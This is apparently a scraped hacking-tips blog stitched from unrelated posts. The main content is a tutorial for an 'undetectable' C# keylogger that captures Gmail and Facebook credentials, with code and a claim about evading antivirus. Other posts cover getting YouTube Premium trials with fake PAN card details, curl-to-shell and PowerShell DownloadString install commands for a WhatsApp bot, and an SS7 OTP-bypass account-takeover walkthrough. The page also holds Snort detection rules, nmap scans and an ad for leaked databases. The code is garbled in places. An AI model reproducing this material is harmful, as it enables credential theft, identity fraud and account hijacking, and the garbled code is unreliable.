Advertisement

Renderforest

What is Renderforest?

Our mission is to make successful branding affordable and available to everyone. We provide you with the most advanced marketing tools to create broadcast-quality videos and animations, impressive graphic designs, iconic logos, and professional websites effortlessly.

Why I like renderforest?
Renderforest is the unique website for making intro,logo , promo and this is best for people who can't afford a good pc/ laptop and they want to make intro or logo then the render forest is best I also make many intros from render forest and its quality is next level that's why I always suggest render forest .

Some screenshots of Render forest

Direct link : https://www.renderforest.com/


My favourite Intro Template:  Render forest

How to get YouTube Premium For Free 2021


Hi every body today i will show you that how you can get YOUTUBE Premium in Free 


What is YOUTUBE Premium??

in YOUTUBE Premium you can watch or listen Videos without ads and also you can play video in background.

How to get premium??

just follow my steps!

 

• first create a fresh g mail

• Download Airtel App ( For Virtual Credit Card    only available in India you can also use other    that are available in your country ) 

• signup using your details (you can use fake       info)

• Enter Your Fake Pan Card Details And You       Will Get VCC ( Virtual Credit Card ) 

• Add ₹2 Amount Or ₹5 In The Airtel Wallet ( It   Will Be Added To Your VCC ) 

• Now go to YouTube premium (search on   google)

• Enter Your VCC Details And ₹2 Will Be   Debited 

• boom you got 2 Month trial (you can repeat   method)






How to create your own undetectable smart keylogger

Now i will tell and show you how to create your own keylogger that will not be detected by any of the existing antiviruses. And all this is also free. 

Interesting? Then let's go!



Introduction

A keylogger is software or some kind of physical device that can intercept and remember keystrokes on a compromised machine. Think of this as a digital trap for every keystroke on the keyboard.



Often this function is implemented in other, more complex software, for example, Trojans (Remote Access Trojans RATS), which ensure the delivery of intercepted data back to the attacker. There are also hardware keyloggers, but they are less common because require direct physical access to the machine.



Nevertheless, it is quite easy to program the basic functions of a keylogger. 

Further, this code will not be optimized, I will just show you the lines of code that can accomplish the task, this is not the most elegant or optimal way. And finally, I will not talk about how to make a keylogger resistant to reboots or try to make it completely fingerless thanks to special programming techniques, as well as about protecting against deletion, even if it is found.



Get down to business!



To connect to the keyboard, you only need to use 2 lines in C #:



1. [DllImport ("user32.dll")] 

2. 

3.public static extern int GetAsyncKeyState (Int32 i);



GetAsyncKeyState - This function determines whether a key was pressed or released at the time of the call and whether it was pressed after the previous call. Now we constantly call this function to receive data from the keyboard



1. while (true)

2. {

3. Thread.Sleep (100);

4.for (Int32 i = 0; i <255; i ++)

five. {

6. int state = GetAsyncKeyState (i);

7.if (state == 1 || state == -32767)

8. {

9. Console.WriteLine ((Keys) i);

ten. 

eleven. }

12. }

13. }



What's going on here? This cycle will poll each key every 100ms to determine its state. If one of them is pressed (or was pressed), a message about this will be displayed on the console. In real life, this data is buffered and sent to the hacker, i.e. us.



Smart keylogger:



Wait, is there any point in trying to shoot all the information in a row from all applications?



The code above pulls in raw keyboard input from whatever window and input field is currently the focus. If your goal is credit card numbers and passwords, then this approach is not very effective. For scenarios from the real world, when such keyloggers are executed on hundreds or thousands of machines, the subsequent parsing of data can become very time-consuming and, as a result, become meaningless. information valuable to a cracker may be out of date by that time.



Let's assume that I want to get my hands on Facebook or Gmail credentials to sell likes. Then the new idea is to activate keylogging only when the browser window is active and there is the word Gmail or facebook in the title of the page. By using this method, I increase the chances of getting credentials.



Second version of the code:



1. while (true) 
2. {
3. IntPtr handle = GetForegroundWindow ();
4.if (GetWindowText (handle, buff, chars)> 0)
five. {
6.string line = buff.ToString ();
7. if (line.Contains ("Gmail") || line.Contains ("Facebook - Log In or Sign Up"))
8. {
9. // test the keyboard 
ten. }
eleven. }
12. Thread.Sleep (100);
13. }


This snippet will reveal an active window every 100ms. This is done using the GetForegroundWindow function (more information on MSDN). The page title is stored in the buff variable, if it contains gmail or facebook, then the keyboard scan snippet is called.



By doing this, we ensured that the keyboard was scanned only when the browser window was open on facebook and gmail.



An even smarter keylogger



Let's assume that the hacker was able to get the data with code like ours. Let's also assume that he is ambitious enough and was able to infect tens or hundreds of thousands of cars. Result: a huge file with gigabytes of text, in which the necessary information still needs to be found. It's time to get familiar with regular expressions or regex. This is something like a mini-language for composing certain templates and scanning text for compliance with the given templates.



For simplicity, I will immediately give ready-made expressions that correspond to login names and passwords:



1. // Looking for a postal address
2. ^ [\ w! # $% & '* + \ - / =? \ ^ _ {|} ~] + (\. [\ W! # $% &' * + \ - / =? \ ^ _ {|} ~] +) * @ ((([\ - \ w] + \.) + [a-zA-Z] {2,4}) | (([0-9] {1,3 } \.) {3} [0-9] {1,3})) $
3.  
4.  
5. // Looking for a password
6. (? = ^. {6,} $) (? =. * \ D) (? =. * [A-zA-Z])


These expressions are here as a hint on what can be done using them. With regular expressions, you can search (and find!) Any construct that has a specific and unchanging format, such as passport numbers, credit card numbers, accounts, and even passwords.



Indeed, regular expressions are not the most readable kind of code, but they are one of the programmer's best friends when it comes to parsing text. Java, C #, JavaScript and other popular languages ​​already have ready-made functions to which you can pass regular regular expressions.



For C # it looks like this:



1. Regex re = new Regex (@ "^ [\ w! # $% & Amp; '* + \ - / =? \ ^ _ {|} ~] + (\. [\ W! # $% & Amp; '* + \ - / =? \ ^ _ {|} ~] +) * @ ((([\ - \ w] + \.) + [a-zA-Z] {2,4}) | ( ([0-9] {1,3} \.) {3} [0-9] {1,3})) $ "); 2. Regex re
2 = new Regex (@ "(? = ^. {6,} $) (? =. * \ D) (? =. * [A-zA-Z])"); 
3. string email = "Oded.awask@gmail.com"; 
4. string pass = "abcde3FG"; 
5. Match result = re.Match (email); 
6. Match result2 = re2.Match (pass);


Where the first expression (re) will match any email, and the second (re2) any digit of an alphabetic construction is greater than 6 characters.



Free and no detections



In my example, I used Visual Studio - you can use your favorite environment - to create such a keylogger in 30 minutes.



There is only one question left: will such software really be undetectable for antivirus programs?



I compiled my code and checked the exe file on the Virustotal website. It is a web-based tool that calculates the hash of the file you downloaded and looks for it in a database of known viruses. Surprise! Naturally, nothing was found.



This is the main feature! You can always change the code and develop, being always several steps ahead of threat scanners. If you are able to write your own code, it is almost guaranteed to be undetectable



So that's it


How to detect DDOS, PING, etc using SNORT

How to detect DDOS, PING, etc using SNORT
Snort is a packet sniffer that monitors network traffic in real time, scrutinizing each packet closely to detect a dangerous payload or suspicious anomalies.



My OS :- ubuntu

Let my ip address be 192.168.1.103



🅢🅔🅣🅤🅟:- ( will be easy in future ) 



First you need to make some changes in configuration of snort. 



𝚜𝚞𝚍𝚘 𝚐𝚎𝚍𝚒𝚝 /𝚎𝚝𝚌/𝚜𝚗𝚘𝚛𝚝/𝚜𝚗𝚘𝚛𝚝.𝚌𝚘𝚗𝚏



Now, change HOME_NET IP address to your ip range. 

Like, 

𝚒𝚙𝚟𝚊𝚛 𝙷𝙾𝙼𝙴_𝙽𝙴𝚃 𝟷𝟿𝟸.𝟷𝟼𝟾.𝟷.𝟶/𝟸𝟺



Now go to

/𝚎𝚝𝚌/𝚜𝚗𝚘𝚛𝚝/𝚛𝚞𝚕𝚎𝚜/𝚕𝚘𝚌𝚊𝚕.𝚛𝚞𝚕𝚎𝚜

and add the rules given below



( Watch rules writing in the image. ) 



🅓🅔🅣🅔🅒🅣 🅟🅘🅝🅖 🅢🅒🅐🅝



𝙍𝙪𝙡𝙚:-

𝚊𝚕𝚎𝚛𝚝 𝚒𝚌𝚖𝚙 𝚊𝚗𝚢 𝚊𝚗𝚢 -> $𝙷𝙾𝙼𝙴_𝙽𝙴𝚃 𝚊𝚗𝚢 (𝚖𝚜𝚐:"𝙿𝚒𝚗𝚐 𝚍𝚎𝚝𝚎𝚌𝚝𝚎𝚍"; 𝚜𝚒𝚍:𝟷𝟶𝟶𝟶𝟶𝟶𝟷; 𝚛𝚎𝚟:𝟷; 𝚌𝚕𝚊𝚜𝚜𝚝𝚢𝚙𝚎:𝚒𝚌𝚖𝚙-𝚎𝚟𝚎𝚗𝚝;)



alert ---> show alert 



ICMP ---> It's a protocol used to report error in ipv4



-> :- to



$HOME_NET ---> destination ip



msg ---> shows message which you write



sid ---> keyword is used to uniquely identify Snort rules. This information allows output plugins to identify rules easily.

100 - 1,000,000 Rules already registered . So u need to use greater than this id like 1,000,123.



rev ---> keyword is used to uniquely identify revisions of Snort rules



classtype:icmp-event ---> Categorizes the rule as an “icmp-event”, one of the predefined Snort categories. This option helps with rule organization.



𝘿𝙚𝙩𝙚𝙘𝙩𝙞𝙣𝙜

𝚜𝚞𝚍𝚘 𝚜𝚗𝚘𝚛𝚝 -𝙰 𝚌𝚘𝚗𝚜𝚘𝚕𝚎 -𝚚 -𝚌 /𝚎𝚝𝚌/𝚜𝚗𝚘𝚛𝚝/𝚜𝚗𝚘𝚛𝚝.𝚌𝚘𝚗𝚏 -𝚒 𝚎𝚑𝚝𝟶





-A console ----> shows standard output alert

-q ----> quite mode

-i ----> interface

-c ----> config





🅓🅔🅣🅔🅒🅣 🅣🅒🅟 🅢🅒🅐🅝



𝙍𝙪𝙡𝙚:-

𝚊𝚕𝚎𝚛𝚝 𝚝𝚌𝚙 𝚊𝚗𝚢 𝚊𝚗𝚢 -> $𝙷𝙾𝙼𝙴_𝙽𝙴𝚃 𝚊𝚗𝚢 (𝚖𝚜𝚐: "𝚃𝙲𝙿 𝚂𝚌𝚊𝚗 𝙳𝚎𝚝𝚎𝚌𝚝𝚎𝚍"; 𝚜𝚒𝚍:𝟷𝟶𝟶𝟶𝟶𝟶𝟶𝟻; 𝚛𝚎𝚟:𝟸; )





🅓🅔🅣🅔🅒🅣 🅓🅞🅢 🅐🅣🅣🅐🅒🅚



𝙍𝙪𝙡𝙚:-

𝚊𝚕𝚎𝚛𝚝 𝚝𝚌𝚙 𝚊𝚗𝚢 𝚊𝚗𝚢 -> $𝙷𝙾𝙼𝙴_𝙽𝙴𝚃 𝟾𝟶 (𝚏𝚕𝚊𝚐𝚜: 𝚂; 𝚖𝚜𝚐:"𝙿𝚘𝚜𝚜𝚒𝚋𝚕𝚎 𝙳𝚘𝚂 𝙰𝚝𝚝𝚊𝚌𝚔 𝚃𝚢𝚙𝚎 : 𝚂𝚈𝙽 𝚏𝚕𝚘𝚘𝚍"; 𝚏𝚕𝚘𝚠:𝚜𝚝𝚊𝚝𝚎𝚕𝚎𝚜𝚜; 𝚜𝚒𝚍:𝟹; 𝚍𝚎𝚝𝚎𝚌𝚝𝚒𝚘𝚗_𝚏𝚒𝚕𝚝𝚎𝚛:𝚝𝚛𝚊𝚌𝚔 𝚋𝚢_𝚍𝚜𝚝, 𝚌𝚘𝚞𝚗𝚝 𝟸𝟶, 𝚜𝚎𝚌𝚘𝚗𝚍𝚜 𝟷𝟶;)



#reference__researchgate-website



𝙀𝙭𝙩𝙧𝙖

Ping scan :- nmap 192.168.1.103

Tcp scan :- nmap -sT 192.168.1.103

Dos :- Use any tools😐



Credit :- I am groot 

Make fake account on WhatsApp using US/ CANADA'S number - Latest working method

This is one of the most wanted tutorial cz many of us want to create, but aren't able to do so....



Maybe you have seen some of your WhatsApp contacts are using USA numbers but their nationality is from any another country. So, how they get the fake number for WhatsApp even they are not living there. So, this post is going to be very interesting to read the full article to know how to get free number for WhatsApp verification. You can do prank also with your family, friends, colleagues.



Create Fake Number For Whatsapp....!!

Talkatone <Click here>
Whatsapp
Windscribe VPN <If you are one of the first you'll get premium credentials anywhere between this blog> 

Usage :

Talkatone : This app is used for getting a fake USA number. Their service is too good you can purchase their premium plan also which is good. But for creating your WhatsApp account you don’t need any premium plans.

Whatsapp : For using your WhatsApp via text now mobile number.


Downloaded required apps? Now we can head towards next step.....! 
Now you have to open your WindScribe VPN and connect to USA/ CANADA'S IP
After doing so, open your talkatone application
Sign up over there with your orignal details, don't use any tempmail, etc 

Note : While signing up if you face problem like VPN detected, etc change your IP to another area and clear data of your application 

After this just enter the area code over their (I personally tried on 786 you can use any of em')
You'll get bunch of 5 numbers over their, none of em are banned so you can select any of them without verifying on WhatsApp
After selecting your number just head on to WhatsApp application and verify it with this number


WOAHH.....

After successfully verifying your number you can able to use your WhatsApp via USA number.

Chota Summary :

We have used a service which is giving free our mobile numbers and by using that mobile number I created a WhatsApp account. So, anybody can do this it’s too easy guys. 







ADVANTAGES :.
You can prank your friend, family etc.
You can use WhatsApp via US number without anyone let know about this
 It’s easy to share this number with everyone instead of sharing your private number.

DISADVANTAGES:

Many peoples are using this to create a fake WhatsApp account to malaise others.
Many people are using this for online money fraud.
This led to many online scams
Hacker does spam


So, be safe guys! Don’t use this trick for any bad purposes. Because if you use this for any bad purposes then the cyber cell can arrest you. I don’t want that you will immix in any kind of situation. So, keep safe and enjoy.

How to setup what's App user Bot like telegram rose








How to set up Whatsasena?



1. Termux or download iSH. if you using pc; Powershell run as administrator.

REPO: https://github.com/quiec/whatsasena

2. Paste the codes;

       ° Termux: bash <(curl -L https://t.ly/qYqy)

iOS: There is no support for IOS

Windows 10: Invoke-Expression (New-Object System.Net.WebClient).DownloadString('https://gitlab.com/Quiec/whatsasena/-/raw/master/windows.ps1')

3. If it asks questions like Y/N please type Y If all transactions done successfully, you will see a QR code., you need to scan this QR code in the WhatsApp. Process is so simple;

Open the WhatsApp.

Click on the 3 dots above.

Choose Whatsapp Web.

Scan the QR code.

4. It will give us long code that starts with ASENA ;;;. This String Session specially designed by the AsenaDev team. Copy this.

5. Click This link and click the purple button.

Paste the code you received into the ASENA_SESSIONS section.









Command

*🛠 All Command:*

.asena



*🛠 Command:*

.ban

*💬 Description:*

Ban someone in the group. Reply to message or tag a person to use command.



*🛠 Command:*

.add

*💬 Description:*

Adds someone to the group.

*⌨️ Example:*

.add 905xxxxxxxxx



*🛠 Command:*

.promote

*💬 Description:*

Makes any person an admin.



*🛠 Command:*

.demote

*💬 Description:*

Takes the authority of any admin.



*🛠 Command:*

.mute

*💬 Description:*

Mute the group chat. Only the admins can send a message.



*🛠 Command:*

.unmute

*💬 Description:*

Unmute the group chat. Anyone can send a message.



*🛠 Command:*

.invite

*💬 Description:*

Provides the group's invitation link.



*🛠 Command:*

.afk

*💬 Description:*

It makes you AFK.



*🛠 Command:*

.term

*💬 Description:*

Allows to run the command on the server's shell.

*⌨️ Example:*

.term ls



*🛠 Command:*

.filter

*💬 Description:*

It adds a filter. If someone writes your filter, it send the answer. If you just write .filter, it show's your filter list.

*⌨️ Example:*

.filter "merhaba" "merhaba, nasılsın?"





 

*🛠 Command:*

.stop

*💬 Description:*

Stops the filter you added previously.

*⌨️ Example:*

.stop "merhaba"



*🛠 Command:*

.welcome

*💬 Description:*

It sets the welcome message. If you leave it blank it shows the welcome message.



*🛠 Command:*

.goodbye

*💬 Description:*

Sets the goodbye message. If you leave blank, it show's the goodbye message.



*🛠 Command:*

.meme



*🛠 Command:*

.kickme

*💬 Description:*

It kicks you grop you are.



*🛠 Command:*

.pp

*💬 Description:*

Makes the profile photo what photo you reply.



*🛠 Command:*

.removebg

*💬 Description:*

Removes the background of the photos.



*🛠 Command:*

.trt

*💬 Description:*

It translates with Google Translate. You must reply any massage.

*⌨️ Example:*

.trt tr it (From Turkish to Italian)



*🛠 Command:*

.currency



*🛠 Command:*

.tts

*💬 Description:*

It converts text to sound.



*🛠 Command:*

.song

*💬 Description:*

Uploads the song you wrote.



*🛠 Command:*

.video

*💬 Description:*

Downloads video from YouTube.



*🛠 Command:*

.yt

*💬 Description:*

It searchs on YouTube.



*🛠 Command:*

.wiki

*💬 Description:*

Searches Wikipedia.



*🛠 Command:*

.sticker

*💬 Description:*

It converts your replied photo or video to sticker.



*🛠 Command:*

.alive

*💬 Description:*

Does bot work?



*🛠 Command:*

.sysd

*💬 Description:*

Shows the system properties.



*🛠 Command:*

.tagall

*💬 Description:*

Tags everyone in the group.



*🛠 Comand:*

.update

*💬 Description:*

Checks the update.



*🛠 Command:*

.weather

*💬 Description:*

Shows the weather.

*⌨️ Example:*

.weather Bakü



*🛠 Command:*

.speedtest

*💬 Description:*

Measures Download and Upload speed.



*🛠 Command:*

.ping

*💬 Description:*

Measures your ping.

Disclaimer

WhatsApp name, its variations and the logo are registered trademarks of Facebook. We have nothing to do with the registered trademarkHow to set up Whatsasena?



1. Termux or download iSH. if you using pc; Powershell run as administrator.

REPO: https://github.com/quiec/whatsasena

2. Paste the codes;

       ° Termux: bash <(curl -L https://t.ly/qYqy)

iOS: There is no support for IOS

Windows 10: Invoke-Expression (New-Object System.Net.WebClient).DownloadString('https://gitlab.com/Quiec/whatsasena/-/raw/master/windows.ps1')

3. If it asks questions like Y/N please type Y If all transactions done successfully, you will see a QR code., you need to scan this QR code in the WhatsApp. Process is so simple;

Open the WhatsApp.

Click on the 3 dots above.

Choose Whatsapp Web.

Scan the QR code.

4. It will give us long code that starts with ASENA ;;;. This String Session specially designed by the AsenaDev team. Copy this.

5. Click This link and click the purple button.

Paste the code you received into the ASENA_SESSIONS section.









Command

*🛠 All Command:*

.asena



*🛠 Command:*

.ban

*💬 Description:*

Ban someone in the group. Reply to message or tag a person to use command.



*🛠 Command:*

.add

*💬 Description:*

Adds someone to the group.

*⌨️ Example:*

.add 905xxxxxxxxx



*🛠 Command:*

.promote

*💬 Description:*

Makes any person an admin.



*🛠 Command:*

.demote

*💬 Description:*

Takes the authority of any admin.



*🛠 Command:*

.mute

*💬 Description:*

Mute the group chat. Only the admins can send a message.



*🛠 Command:*

.unmute

*💬 Description:*

Unmute the group chat. Anyone can send a message.



*🛠 Command:*

.invite

*💬 Description:*

Provides the group's invitation link.



*🛠 Command:*

.afk

*💬 Description:*

It makes you AFK.



*🛠 Command:*

.term

*💬 Description:*

Allows to run the command on the server's shell.

*⌨️ Example:*

.term ls



*🛠 Command:*

.filter

*💬 Description:*

It adds a filter. If someone writes your filter, it send the answer. If you just write .filter, it show's your filter list.

*⌨️ Example:*

.filter "merhaba" "merhaba, nasılsın?"





 

*🛠 Command:*

.stop

*💬 Description:*

Stops the filter you added previously.

*⌨️ Example:*

.stop "merhaba"



*🛠 Command:*

.welcome

*💬 Description:*

It sets the welcome message. If you leave it blank it shows the welcome message.



*🛠 Command:*

.goodbye

*💬 Description:*

Sets the goodbye message. If you leave blank, it show's the goodbye message.



*🛠 Command:*

.meme



*🛠 Command:*

.kickme

*💬 Description:*

It kicks you grop you are.



*🛠 Command:*

.pp

*💬 Description:*

Makes the profile photo what photo you reply.



*🛠 Command:*

.removebg

*💬 Description:*

Removes the background of the photos.



*🛠 Command:*

.trt

*💬 Description:*

It translates with Google Translate. You must reply any massage.

*⌨️ Example:*

.trt tr it (From Turkish to Italian)



*🛠 Command:*

.currency



*🛠 Command:*

.tts

*💬 Description:*

It converts text to sound.



*🛠 Command:*

.song

*💬 Description:*

Uploads the song you wrote.



*🛠 Command:*

.video

*💬 Description:*

Downloads video from YouTube.



*🛠 Command:*

.yt

*💬 Description:*

It searchs on YouTube.



*🛠 Command:*

.wiki

*💬 Description:*

Searches Wikipedia.



*🛠 Command:*

.sticker

*💬 Description:*

It converts your replied photo or video to sticker.



*🛠 Command:*

.alive

*💬 Description:*

Does bot work?



*🛠 Command:*

.sysd

*💬 Description:*

Shows the system properties.



*🛠 Command:*

.tagall

*💬 Description:*

Tags everyone in the group.



*🛠 Comand:*

.update

*💬 Description:*

Checks the update.



*🛠 Command:*

.weather

*💬 Description:*

Shows the weather.

*⌨️ Example:*

.weather Bakü



*🛠 Command:*

.speedtest

*💬 Description:*

Measures Download and Upload speed.



*🛠 Command:*

.ping

*💬 Description:*

Measures your ping.

Disclaimer

WhatsApp name, its variations and the logo are registered trademarks of Facebook. We have nothing to do with the registered trademark.


Join Our Telegram Group for More quality and experience course for free Cources like leaked course , leaked database , Exclusive  , dark Web leaked database etc......

Telegram Group
https://t.me/joinchat/PJ9tCE9nTc-hqbZobktUQg

SS7 A to Z - OTP bypass, Telegram/ WhatsApp hacking/ Prevention/ Installation!

 What is ss7 ?


SS7 (Common Channel Signaling System No. 7 or C7) has been the industry standard since, and hasn’t advanced much in decades. It’s outdated security concepts make it especially vulnerable to hackers.


SS7’s success has also, in a way, been its curse. At least when it comes to cyber security. The SS7 protocol is used everywhere, and is the leading protocol for connecting network communication worldwide. 


As such, SS7 is an attacker’s best friend, enabling them access to the same surveillance capabilities held by law enforcement and intelligence agencies.


How does ss7 work?


The set of SS7 telephony signaling protocols is responsible for setting up and terminating telephone calls over a digital signaling network to enable wireless cellular and wired connectivity. It is used to initiate most of the world’s public telephone calls over PSTN (Public Switched Telephone Network).

Over time other applications were integrated into SS7. This allowed for the introduction of new services like SMS, number translation, prepaid billing, call waiting/forwarding, conference calling, local number portability, and other mass-market services.
Components and elements that make up the SS7 Protocol Stack –
What are SS7 attacks?

SS7 attacks are mobile cyber attacks that exploit security vulnerabilities in the SS7 protocol to compromise and intercept voice and SMS communications on a cellular network. Similar to a Man In the Middle attack, SS7 attacks target mobile phone communications rather than wifi transmissions.


How do SS7 attacks work?

SS7 attacks exploit the authentication capability of communication protocols running atop the SS7 protocol to eavesdrop on voice and text communications. All cyber criminal would need to successfully launch an SS7 attack are a computer running Linux and the SS7 SDK – both free to download from the Internet.
Once connected to an SS7 network, the hacker can target subscribers on the network while fooling the network into thinking the hacker device is actually an MSC/VLR node.
What’s in it for the Hackers?


When a hacker successfully performs a MitM phishing attack, they gain access to the same amounts and types of information that are usually reserved for the use of security services. Having the ability to eavesdrop on calls and text messages, as well as device locations empowers hackers to gain valuable information.

A common security precaution used by many is one of the targets of SS7 attacks. Two-factor authentication (also known as 2FA) via SMS using SS7 is inherently flawed as these SMS messages are unencrypted and hackers know how to intercept them. With the code from the SMS in their hand, a cyber-criminal can potentially reset your password to Google, Facebook, Whatsapp account or even your bank account.




HOW TO BYPASS OTP WITH SS7 ATTACK 

BYPASSING OTP ?

OTP IS MOSTLY A 4/6 DIGIT NUMERICAL/ALPHANUMERIC CODE USED AS ANOTHER WAY OF AUTHENTICATING A USER ALONG WITH THE CREDENTIALS.


STONE AGE

People used to just enter their email and pass to login.
It still is there for majority of sites but some have 2FA[OTP] as optional and some have it mandatory.


WHY OTP??

BECAUSE PEOPLE CAN HACK/CRACK YOUR EMAIL/PASS EASY
WITH OTP EVEN IF THEY CAN, THEY WONT BE ABLE TO LOGIN


WHAT'S THE OTHER WAY ROUND THIS?

There are tons of other ways to bypass OTP but the most popular and bit of HQ is SS7 Attack.
Comment down below the thread if you want me to write those up too.


So Where were we:
SS7 Tunneling/Attack = Same as MITM but operates on telephonic communication rather than data/wifi communication.Those who got no idea what MITM is can go through my previous thread about it.



Now Why is SS7 HQ

Because the global telephonic communication runs on it.

Old Protocal but hasnt been changed much.


What Tools needed for this Attack?

A Linux OS and SS7 SDK[They re on the Internet]

The Inside Workaround?

Take an Example: Our Freind Roobbin is having some cash piled up in his bank account...Forget it...FBI gonna bust my ass for this example.

Our freind roobbin got an app in his phone which lets him login to his account after entering the credentials and an OTP generated on Real-Time.

We as usual gets the credentials by 
hacking/cracking

But when we treid to log-in to the app using just the email/pass it generated the OTP[Take an example of Hotstar or BLockChain or anything that requires OTP].

When there is some kinda communication via our phone to any other service over the Network, Our Unique Phone address is stored in HLR[Home Location Register] and it acts as a medium to transmit data...See what i learned in "Wireless Communication" is coming in handy right now .The Enggineering guys would know if they had the subject taken.

Ok to be straight .....Phone sends data to HLR and checks the unique address of our mobile device,

Then from there the HLR sends the request to VLR[Virtual Location Register - It temporarilhy stores our mobile info till connection time out].
SS7 Fakes VLR Address and put the hackers machine address in it.So, basically we are tricking the system into beleiving our address to be the users address we need to get the OTP from.

Now you know what...HLR will transmit the details to the fake VLR and hackers gonna get all the details flowing in and out the the victims mobile !



TELEGRAM AND WHATSAPP HACKING
HACKING WITH SIGNAL SYSTEM 7 (SS7) :

Both WHATSAPP and TELEGRAM messaging services have an end-to-end encryption for chats in order to protect the privacy of their users and improve their security.


Is it enough to keep eyes far from them?

No, according to a recent research conducted by techroods hackers can impersonate victims and reply to both WhatsApp and Telegram chat messages.

Hackers can exploit the SIGNAL SYSTEM 7, aka SS7, which is a set of protocols developed in 1975 that allows the connections of one mobile phone network to another. The information passed from a network to another are needed for routing calls and text messages between several networks.

The SS7 performs out-of-band signaling in support of the call establishment, billing, routing, and information exchange functions of the public switched telephone network (PSTN).WHICH is now also use by BLACK HAT HACKERS for BOUNCING their networks

Experts discovered that hackers can exploit a flaw in the SS7 protocol to steal the victim’s identity on the messaging services with just basic skills.

The principal instant messaging services, including WhatsApp and Telegram, rely on the SMS authentication as the primary security verification mechanism, which is routed through SS7 signaling. This means that hackers exploit the SIGNAL SYSTEM 7 to compromise the verification mechanism and take over the victim’s account and impersonate him.

As explained by the experts, the rarest aspect of the story is that hacker does not need high-skills or a special equipment for such attack.

The hackers used a common Linux distro and a publicly available SDK for their tests.

“An intruder doesn’t need special equipment. a hacker used a popular Linux based computer and a publicly available SDK for generating SS7 packets. + After performing an initial attack using SS7 commands, the intruder is able to execute additional attacks using the same methods.” states the paper from Positive Technologies. “For instance, if an intruder manages to determine a subscriber’s location, only one further step is required to intercept SMS messages, commit fraud, etc. + Attacks are based on legitimate SS7 messages.



How hacker can access your bitcoin wallet?

 How Hacker Can Empty Ur Bitcoin Wallet Using Ur Phone no & Email

Security of SMS-based two-factor authentication has been long-debated. Despite flaws in Signalling System No. 7 (SS7), which is an internationally used telecom protocol to route texts and calls, it continues to be used at a large scale in banking and other services.

The security researchers Positive Technologies have shown how a bitcoin wallet can be hacked using SS7 vulnerabilities. By getting their hands on SS7 network, the hackers were able to reset the Gmail passwords using SMS-based two-factor authentication.

A big flaw in SMS-based 2FA is that the one-time password can be accessed on a variety of devices and services, which might have their own flaws. Thus, the attack surface increases. On the other hand, the true 2FA, which is like a push notification popup, sends the verification prompt to one device.
 By intercepting the text messages in transit, the hackers can take control of your Gmail account and any other service associated with it.
Not just cryptocurrency wallets, this flaw puts your banking and social media accounts at risk. “This hack would work for any resource – real currency or virtual currency – that uses SMS for password recovery,” the researchers told Forbes.

Getting access to the SS7 network is the biggest barrier one needs to cross. The cybercriminals can buy the access on the dark web. In the past, at least at one occasion, SS7 was used to empty bank accounts. According to Forbes, many surveillance companies are also selling services to spy using SS7 flaw.


What should the user do?

As stressed earlier, SS7 flaw has been known to the telecom industry from a long time. So, unless they don’t take steps to make it more secure, the users need to take steps on their own. You can use tools like Google Authenticator, Google prompt, or security key for extra security.


How to prevent ss7 attack?

1) Avoid SMS services as much as possible instead try to use encrypted services with end to end encryption (Signal Private Messenger recommended). 

2) Avoid using Calling on the cellular network as much as possible. Use Encryption messenger's calling on an encrypted network. (Again Signal Recommended) 




INSTALLATION OF SS7 IN RED HAT LINUX:-

1. Log on as root.

2. Download the Dialogic NaturalAccess SS7 Monitor Software from www.dialogic.com

3. Unzip and untar the download file by entering the following commands:

TYPE: SETTING : - gzip -d filename.tgztar -xvf filename.tar
where filename is the base portion of the name of the file that you downloaded.

4. Run the monitor_install script located in the directory in which you opened the tar file, and follow the prompts from the script.

Note: Do not change the default install location

 5. Run one of the following commands to implement the environment changes: • . /etc/profile.d/txbase.sh Reboot the system. For additional release information, refer to the release_notes.pdf file located in the software




Thanks for reading
Credit:NayanDubey